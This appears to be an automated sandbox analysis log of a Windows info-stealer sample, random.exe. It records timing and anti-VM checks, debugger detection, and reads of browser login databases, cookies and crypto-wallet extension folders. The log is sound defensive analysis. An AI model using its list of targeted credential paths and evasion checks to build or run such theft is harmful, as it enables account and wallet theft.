      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 5590C7D second address: 5590C93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA8D8E164AAh 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 5590C93 second address: 5590C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 5590C99 second address: 5590CB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA8D8E164B0h 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 5590CB6 second address: 5590CBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 5590CBA second address: 5590CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 5590CC0 second address: 5590CDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 5590CDB second address: 5590CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 5590CDF second address: 5590CE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0AE9 second address: 55A0B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA8D8E164ACh 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0B0D second address: 55A0B28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, 0A390166h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0B28 second address: 55A0B81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA8D8E164B8h 0x00000008 push esi 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007FA8D8E164ACh 0x00000014 cmp dword ptr [75FA459Ch], 05h 0x0000001b jmp 00007FA8D8E164B0h 0x00000020 je 00007FA9497B4338h 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FA8D8E164AAh 0x0000002f rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0B81 second address: 55A0B90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0B90 second address: 55A0B96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0B96 second address: 55A0B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0BE9 second address: 55A0BF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0C7E second address: 55A0CAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b pushad 0x0000000c mov ebx, 5BEF6550h 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop edi 0x00000014 pop esi 0x00000015 popad 0x00000016 mov dword ptr [ebp-1Ch], esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA8D8E1DCFAh 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0D1C second address: 55A0D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0D20 second address: 55A0D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0D26 second address: 55A0D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E164AAh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0D34 second address: 55A0D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0B52 second address: 55B0B6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 mov esi, edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA8D8E164AFh 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0B6F second address: 55B0B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DD04h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0B87 second address: 55B0BB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FA8D8E164B6h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov bl, 7Eh 0x00000018 popad 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0BB7 second address: 55B0BBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0BBD second address: 55B0BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0BC1 second address: 55B0C8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FA8D8E1DD00h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov dh, 2Eh 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 xchg eax, esi 0x00000019 pushad 0x0000001a mov di, 2034h 0x0000001e pushfd 0x0000001f jmp 00007FA8D8E1DCFDh 0x00000024 jmp 00007FA8D8E1DCFBh 0x00000029 popfd 0x0000002a popad 0x0000002b mov esi, dword ptr [ebp+0Ch] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FA8D8E1DD04h 0x00000035 sbb al, 00000018h 0x00000038 jmp 00007FA8D8E1DCFBh 0x0000003d popfd 0x0000003e mov si, 68CFh 0x00000042 popad 0x00000043 test esi, esi 0x00000045 pushad 0x00000046 mov si, A2C7h 0x0000004a mov bx, ax 0x0000004d popad 0x0000004e je 00007FA9497AB469h 0x00000054 pushad 0x00000055 movzx ecx, bx 0x00000058 pushfd 0x00000059 jmp 00007FA8D8E1DD01h 0x0000005e sub ecx, 681F8566h 0x00000064 jmp 00007FA8D8E1DD01h 0x00000069 popfd 0x0000006a popad 0x0000006b cmp dword ptr [75FA459Ch], 05h 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007FA8D8E1DCFDh 0x00000079 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0D78 second address: 55B0D7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeSpecial instruction interceptor: First address: EE586E instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random.exeSpecial instruction interceptor: First address: EE5959 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random.exeSpecial instruction interceptor: First address: 1087103 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random.exeSpecial instruction interceptor: First address: EE365A instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random.exeSpecial instruction interceptor: First address: 111054A instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
      Source: C:\Users\user\Desktop\random.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
      Source: C:\Users\user\Desktop\random.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
      Source: C:\Users\user\Desktop\random.exe TID: 6052Thread sleep time: -180000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\random.exe TID: 520Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
      Source: random.exe, 00000000.00000002.1151080655.0000000001064000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
      Source: random.exe, random.exe, 00000000.00000003.1143968813.0000000001769000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150605286.0000000001769000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151708836.0000000001769000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1061905252.0000000001769000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1112946478.0000000001769000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1124260706.0000000001769000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
      Source: random.exe, 00000000.00000003.1079865848.000000000600C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696501413p
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
      Source: random.exe, 00000000.00000002.1151591333.0000000001728000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150430246.0000000001728000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
      Source: random.exe, 00000000.00000002.1151080655.0000000001064000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
      Source: C:\Users\user\Desktop\random.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\random.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\random.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\random.exeOpen window title or class name: regmonclass
      Source: C:\Users\user\Desktop\random.exeOpen window title or class name: gbdyllo
      Source: C:\Users\user\Desktop\random.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\random.exeOpen window title or class name: procmon_window_class
      Source: C:\Users\user\Desktop\random.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\random.exeOpen window title or class name: ollydbg
      Source: C:\Users\user\Desktop\random.exeOpen window title or class name: filemonclass
      Source: C:\Users\user\Desktop\random.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\random.exeFile opened: NTICE
      Source: C:\Users\user\Desktop\random.exeFile opened: SICE
      Source: C:\Users\user\Desktop\random.exeFile opened: SIWVID
      Source: C:\Users\user\Desktop\random.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\random.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\random.exeProcess queried: DebugPortJump to behavior
      Source: random.exe, 00000000.00000002.1151080655.0000000001064000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: GProgram Manager
      Source: C:\Users\user\Desktop\random.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\random.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: random.exe, 00000000.00000003.1124307891.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150605286.000000000175F000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144094054.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144030458.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150658487.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150727353.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1124260706.000000000175D000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1127822478.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151708836.000000000175F000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1143968813.000000000175F000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151651944.0000000001744000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.1046421738.0000000005400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
